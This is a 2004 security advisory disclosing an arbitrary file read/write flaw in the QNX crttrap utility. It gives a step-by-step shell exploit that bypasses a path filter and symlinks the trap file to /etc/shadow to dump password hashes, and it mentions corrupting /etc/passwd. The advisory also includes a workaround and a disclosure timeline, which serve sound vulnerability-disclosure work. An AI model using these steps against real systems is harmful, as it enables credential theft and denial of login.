QNX crttrap has a -c flag to specify where trap file will be written. Combined with the trap flag it is possible to read or write any file in the disk. QNX RTOS 2.4, 4.25, 6.1.0, 6.2.0 are all affected.
fb4f56b2ec2fdf473fcce500ead2b39f939a04c5e82ccc3ef3ae44701188dac7
*** rfdslabs security advisory ***
Title: QNX crrtrap arbitrary file read/write vulnerability [RLSA_06-2004]
Versions: QNX RTOS 2.4, 4.25, 6.1.0, 6.2.0 (+ Update Patch A)
Vendor: http://www.qnx.com
Date: Dec 11 2004
Author: Julio Cesar Fort <julio *NO_SPAM* rfdslabs com br>
1. Introduction
crrtrap is a tool to detect video hardware and starts the correct driver for
QNX.
2. Details
crttrap has a '-c' flag to specify where trap file will be written. Combined
with 'trap' flag it is possible to read/write any file in the disk.
By default crttrap writes and read trap files in "/etc/system/config". Once
this directory is owned by root we don't have permission to write. It
filters "../" to prevent directory transversal vulnerabilities. In order to
bypass this protection we noticed it doesn't check only for "/".
This way is possible to make it create a sub directory, giving our group
read and write priviledges. Now we are able to manipulate our trap file.
$ crttrap -c tmp/rfdslabs trap
/usr/photon/bin/devgt-iographics -dldevg-svga.so -I0 -d0x5333, 0x8c12
/usr/photon/bin/devgt-iographics -dldevg-vesabios.so -I0 -d0x5333, 0x8c12
crttrap: wrote config file as /etc/system/config/tmp/rfdslabs
$ cd /etc/system/config/tmp
$ ls -la
total 52
drwxrwxr-x 2 root 100 2048 Dec 11 12:40 .
drwxrwxr-x 3 root root 2048 Dec 11 12:35 ..
-rw-r--r-- 1 root 100 21671 Dec 11 12:40 rfdslabs
$ rm -f rfdslabs
$ ln -s /etc/shadow rfdslabs
$ crttrap -c tmp/rfdslabs dump
root:21QjUKxP9gEJK:0:0:0
sandimas:91UzHxvt3x1n2:0:0:0
We are also able to overwrite any file with 'trap' switch. As an example, an
attacker can corrupt '/etc/passwd' and make login attempts fail
everytime.
See www.rfdslabs.com.br for another file deletion vulnerability in crttrap.
PS: In 31 May 2002, Simon Oullette had found a bug in crttrap '-c' flag in
QNX 4.25. But his exploitation technique won't work with newest versions
because crttrap opens "/etc/system/config" and its sub directories.
3. Solution
No official solution yet. We suggest remove crttrap suid bit until QNX don't
release a patch.
4. Timeline
10 Dec 2004: Vulnerability detected;
11 Dec 2004: Advisory written; rfdslabs contacts QNX;
20 Dec 2004: QNX replies back rfdslabs;
28 Dec 2004: Advisory released to public.
Thanks to Lucien Rocha, Carlos Barros (barrossecurity.com), George Fleury,
Rodrigo Costa (NERV).
www.rfdslabs.com.br - computers, sex, human mind, music and more
Recife, PE, Brazil
--
Julio Cesar Fort (julio at rfdslabs com br)
Recife, PE, Brasil
www.rfdslabs.com.br - computers, sex, human mind, music and
more.
________________________________________________
Message sent using
UebiMiau 2.7.2